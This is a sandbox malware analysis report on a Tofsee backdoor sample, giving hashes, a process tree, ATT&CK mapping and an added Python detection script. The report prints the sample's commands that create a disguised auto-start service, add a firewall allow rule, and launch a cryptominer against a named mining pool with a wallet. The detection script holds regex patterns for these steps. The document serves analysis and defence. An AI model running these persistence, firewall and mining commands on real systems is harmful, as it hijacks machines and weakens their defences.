Analysis

  • max time kernel
    145s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    15-11-2020 22:48

General

  • Target

    fe8cb5b58a6e04b1877ba5d8f1c7b37fdc43a73ae8850daeea7eaefca2fad15b.exe

  • Size

    13.2MB

  • MD5

    32b51d4b10b95d049f96e329d77a87e0

  • SHA1

    c7edc30d62b156fc407dc914a726a19b3108b2e3

  • SHA256

    fe8cb5b58a6e04b1877ba5d8f1c7b37fdc43a73ae8850daeea7eaefca2fad15b

  • SHA512

    11408739911bcb93b75c909336fc88733c5702244efa62ae72d8f05276b80da69db362894620f81c323bfebbc0268028de1fe80c9dbf8c121fc598cdaf81a7c0

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    sc.exe is the built-in Windows command-line utility for creating, configuring and controlling services.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fe8cb5b58a6e04b1877ba5d8f1c7b37fdc43a73ae8850daeea7eaefca2fad15b.exe
    "C:\Users\Admin\AppData\Local\Temp\fe8cb5b58a6e04b1877ba5d8f1c7b37fdc43a73ae8850daeea7eaefca2fad15b.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:980
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\nrxkvqii\
      2⤵
      PID:2476
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wijdyuvs.exe" C:\Windows\SysWOW64\nrxkvqii\
      2⤵
      PID:3756
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" create nrxkvqii binPath= "C:\Windows\SysWOW64\nrxkvqii\wijdyuvs.exe /d\"C:\Users\Admin\AppData\Local\Temp\fe8cb5b58a6e04b1877ba5d8f1c7b37fdc43a73ae8850daeea7eaefca2fad15b.exe\"" type= own start= auto DisplayName= "wifi support"
      2⤵
      PID:640
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" description nrxkvqii "wifi internet conection"
      2⤵
      PID:184
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" start nrxkvqii
      2⤵
      PID:2696
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
      2⤵
      PID:2136
  • C:\Windows\SysWOW64\nrxkvqii\wijdyuvs.exe
    C:\Windows\SysWOW64\nrxkvqii\wijdyuvs.exe /d"C:\Users\Admin\AppData\Local\Temp\fe8cb5b58a6e04b1877ba5d8f1c7b37fdc43a73ae8850daeea7eaefca2fad15b.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1412
    • C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      2⤵
      • Deletes itself
      • Drops file in System32 directory
      • Modifies service
      • Suspicious use of SetThreadContext
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:3020
      • C:\Windows\SysWOW64\svchost.exe
        svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:296
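
Read top to bottom, the tree records one persistence chain: the sample creates C:\Windows\SysWOW64\nrxkvqii\, moves the dropped wijdyuvs.exe into it, registers that file with sc.exe as the auto-start service nrxkvqii (display name "wifi support") with the original sample path passed as a /d argument, adds a netsh inbound allow rule for C:\Windows\SysWOW64\svchost.exe, and starts the service. The service binary (PID 1412) then launches svchost.exe (PID 3020) with SetThreadContext and WriteProcessMemory activity, which is the footprint of the child's image being replaced, and that process launches a second svchost.exe (PID 296) with -o pool:port -u wallet -p x -k, the option set XMRig takes (-o url, -u user, -p password, -k keepalive), pointed at msr.pool.gntl.co.uk:40005. The SysWOW64 paths throughout show a 32-bit binary on the 64-bit sandbox.

The Python below is an added example, not part of this report or of any Tofsee tooling. It turns those observations into detection rules over process-creation events (Sysmon event 1 or 4688 style: PID, image, parent image, command line) and pulls the IOCs back out of the command lines. EVENTS is constructed from the tree above; the parent images of PID 980 (explorer.exe) and PID 1412 (services.exe, since the SCM starts the service) are assumptions the report does not show, and every regex and function name is the example's own.

```python
"""Added example: detection rules over process-creation events for the chain in
the process tree above. EVENTS is constructed from that tree; parents marked
ASSUMED are not shown in the report."""
import re
from typing import Dict, List, Optional

SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\fe8cb5b58a6e04b1877ba5d8f1c7b37fdc43a73ae8850daeea7eaefca2fad15b.exe")
SVC_EXE = r"C:\Windows\SysWOW64\nrxkvqii\wijdyuvs.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
WALLET = ("5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6Sij"
          "YVz1ntV1TAa5qAMCwu+60000")

EVENTS: List[Dict[str, object]] = [
    {"pid": 980, "image": SAMPLE, "parent": r"C:\Windows\explorer.exe",  # parent ASSUMED
     "cmdline": '"' + SAMPLE + '"'},
    {"pid": 2476, "image": r"C:\Windows\SysWOW64\cmd.exe", "parent": SAMPLE,
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\nrxkvqii' + "\\"},
    {"pid": 3756, "image": r"C:\Windows\SysWOW64\cmd.exe", "parent": SAMPLE,
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C move /Y '
                r'"C:\Users\Admin\AppData\Local\Temp\wijdyuvs.exe" C:\Windows\SysWOW64\nrxkvqii' + "\\"},
    {"pid": 640, "image": r"C:\Windows\SysWOW64\sc.exe", "parent": SAMPLE,
     "cmdline": r'"C:\Windows\System32\sc.exe" create nrxkvqii binPath= "' + SVC_EXE
                + r' /d\"' + SAMPLE + r'\"" type= own start= auto DisplayName= "wifi support"'},
    {"pid": 184, "image": r"C:\Windows\SysWOW64\sc.exe", "parent": SAMPLE,
     "cmdline": r'"C:\Windows\System32\sc.exe" description nrxkvqii "wifi internet conection"'},
    {"pid": 2696, "image": r"C:\Windows\SysWOW64\sc.exe", "parent": SAMPLE,
     "cmdline": r'"C:\Windows\System32\sc.exe" start nrxkvqii'},
    {"pid": 2136, "image": r"C:\Windows\SysWOW64\netsh.exe", "parent": SAMPLE,
     "cmdline": r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule '
                r'name="Host-process for services of Windows" dir=in action=allow '
                r'program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul'},
    {"pid": 1412, "image": SVC_EXE, "parent": r"C:\Windows\System32\services.exe",  # ASSUMED (SCM)
     "cmdline": SVC_EXE + ' /d"' + SAMPLE + '"'},
    {"pid": 3020, "image": SVCHOST, "parent": SVC_EXE, "cmdline": "svchost.exe"},
    {"pid": 296, "image": SVCHOST, "parent": SVCHOST,
     "cmdline": "svchost.exe -o msr.pool.gntl.co.uk:40005 -u " + WALLET + " -p x -k"},
]

# Command-line patterns. sc.exe's "key= value" spacing and the escaped quotes inside
# binPath are exactly what makes a naive split-on-whitespace parser miss the dropper path.
SC_CREATE = re.compile(r'sc\.exe"?\s+create\s+(?P<name>\S+)\s+binPath=\s*"(?P<bin>.*?)"\s+type=', re.I)
SC_START = re.compile(r'\bstart=\s*(?P<v>\S+)', re.I)
SC_DISPLAY = re.compile(r'DisplayName=\s*"(?P<v>[^"]*)"', re.I)
DROPPER_ARG = re.compile(r'/d\\?"(?P<v>.*?)\\?"')  # the /d\"<path>\" argument inside binPath
NETSH_ALLOW = re.compile(r'netsh\.exe"?\s+advfirewall\s+firewall\s+add\s+rule\s+name="(?P<name>[^"]*)"'
                         r'.*?\baction=(?P<action>\w+).*?\bprogram="(?P<prog>[^"]*)"', re.I)
MINER = re.compile(r'(?:^|\s)-o\s+(?P<host>[\w.\-]+):(?P<port>\d+)\s+-u\s+(?P<user>\S+)(?:\s+-p\s+(?P<pw>\S+))?')


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def under_user_temp(path: str) -> bool:
    return "\\appdata\\local\\temp\\" in path.lower()


def staged_under_system_dir(path: str) -> bool:
    # True for an image in a *subdirectory* of System32/SysWOW64, where no shipped service binary lives.
    m = re.match(r"^[a-z]:\\windows\\(system32|syswow64)\\(.+)$", path.lower())
    return bool(m) and "\\" in m.group(2)


def parse_sc_create(cmdline: str) -> Optional[Dict[str, str]]:
    m = SC_CREATE.search(cmdline)
    if not m:
        return None
    binpath, d = m.group("bin"), DROPPER_ARG.search(m.group("bin"))
    st, disp = SC_START.search(cmdline), SC_DISPLAY.search(cmdline)
    return {"service": m.group("name"), "image": binpath.split(" /d", 1)[0].strip(),
            "dropper": d.group("v") if d else "", "start": st.group("v").lower() if st else "",
            "display": disp.group("v") if disp else ""}


def parse_netsh_allow(cmdline: str) -> Optional[Dict[str, str]]:
    m = NETSH_ALLOW.search(cmdline)
    if not m or m.group("action").lower() != "allow":
        return None
    return {"rule_name": m.group("name"), "program": m.group("prog")}


def parse_miner_args(cmdline: str) -> Optional[Dict[str, str]]:
    m = MINER.search(cmdline)
    if not m:
        return None
    return {"pool": m.group("host"), "port": m.group("port"), "wallet": m.group("user"),
            "password": m.group("pw") or ""}


def detect(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    findings: List[Dict[str, object]] = []
    for ev in events:
        pid, image, parent, cmd = ev["pid"], str(ev["image"]), str(ev["parent"]), str(ev["cmdline"])
        svc = parse_sc_create(cmd)
        if svc and (staged_under_system_dir(svc["image"]) or under_user_temp(parent)):
            findings.append({"rule": "service_persistence", "pid": pid, **svc})
        fw = parse_netsh_allow(cmd)
        # Windows' own svchost rules are installed with the OS, not added by netsh from a Temp-launched process.
        if fw and basename(fw["program"]) == "svchost.exe" and under_user_temp(parent):
            findings.append({"rule": "firewall_allow_svchost", "pid": pid, **fw})
        if basename(image) == "svchost.exe" and basename(parent) != "services.exe":
            findings.append({"rule": "svchost_parent_anomaly", "pid": pid, "parent": parent})
        miner = parse_miner_args(cmd)
        if miner:
            findings.append({"rule": "miner_cmdline", "pid": pid, **miner})
    return findings


def iocs(findings: List[Dict[str, object]]) -> Dict[str, str]:
    out: Dict[str, str] = {}
    for f in findings:
        if f["rule"] == "service_persistence":
            out.update(service=str(f["service"]), service_image=str(f["image"]), dropper=str(f["dropper"]))
        elif f["rule"] == "firewall_allow_svchost":
            out["firewall_rule"] = str(f["rule_name"])
        elif f["rule"] == "miner_cmdline":
            out["pool"], out["wallet"] = f"{f['pool']}:{f['port']}", str(f["wallet"])
    return out


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
    print(iocs(detect(EVENTS)))
```

The svchost parent check is the one that survives renaming: the service name, directory and display name are per-sample, and the pool can change, but a legitimate svchost.exe is always a child of services.exe, so PIDs 3020 and 296 are flagged regardless of what they were given as arguments. The sc create parser is the one to keep strict; the /d argument is the only place the report links the service back to the original dropper path, and that path is what the "Deletes itself" signature on PID 3020 acts on.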

MITRE ATT&CK Matrix (ATT&CK v6)

Persistence

  • New Service (T1050), 1 signature
  • Modify Existing Service (T1031), 2 signatures
  • Registry Run Keys / Startup Folder (T1060), 1 signature

Privilege Escalation

  • New Service (T1050), 1 signature

Defense Evasion

  • Disabling Security Tools (T1089), 1 signature
  • Modify Registry (T1112), 3 signatures


Downloads

  • C:\Users\Admin\AppData\Local\Temp\wijdyuvs.exe

    MD5

    43cb5acf7e9764991c2f2954261ce4c4

    SHA1

    a51fa73b63b8033a546a4f7aef4f1df096b94274

    SHA256

    a505c83a79eec9e82d7305911e2a8e7b95f340bd78c0efc504603cbf3fe6847a

    SHA512

    39500cc5cc1af197e84edb57382c670160fa1e26f784db2c053f0bc381cfbc4ba4307288dee4eae27f624e0dc47c8c4657f38ff3678d9b8cfcc02596d8f61936

  • C:\Windows\SysWOW64\nrxkvqii\wijdyuvs.exe

    MD5

    43cb5acf7e9764991c2f2954261ce4c4

    SHA1

    a51fa73b63b8033a546a4f7aef4f1df096b94274

    SHA256

    a505c83a79eec9e82d7305911e2a8e7b95f340bd78c0efc504603cbf3fe6847a

    SHA512

    39500cc5cc1af197e84edb57382c670160fa1e26f784db2c053f0bc381cfbc4ba4307288dee4eae27f624e0dc47c8c4657f38ff3678d9b8cfcc02596d8f61936

  • memory/184-4-0x0000000000000000-mapping.dmp
  • memory/296-19-0x0000000000CC259C-mapping.dmp
  • memory/296-17-0x0000000000C30000-0x0000000000D21000-memory.dmp (Filesize 964KB)
  • memory/640-3-0x0000000000000000-mapping.dmp
  • memory/2136-10-0x0000000000000000-mapping.dmp
  • memory/2476-0-0x0000000000000000-mapping.dmp
  • memory/2696-5-0x0000000000000000-mapping.dmp
  • memory/3020-8-0x00000000030A9A6B-mapping.dmp
  • memory/3020-11-0x0000000004E50000-0x000000000505F000-memory.dmp (Filesize 2.1MB)
  • memory/3020-12-0x0000000003230000-0x0000000003236000-memory.dmp (Filesize 24KB)
  • memory/3020-13-0x0000000003240000-0x0000000003250000-memory.dmp (Filesize 64KB)
  • memory/3020-14-0x00000000032A0000-0x00000000032A5000-memory.dmp (Filesize 20KB)
  • memory/3020-15-0x00000000095D0000-0x00000000099DB000-memory.dmp (Filesize 4.0MB)
  • memory/3020-16-0x00000000032B0000-0x00000000032B7000-memory.dmp (Filesize 28KB)
  • memory/3020-7-0x00000000030A0000-0x00000000030B5000-memory.dmp (Filesize 84KB)
  • memory/3756-1-0x0000000000000000-mapping.dmp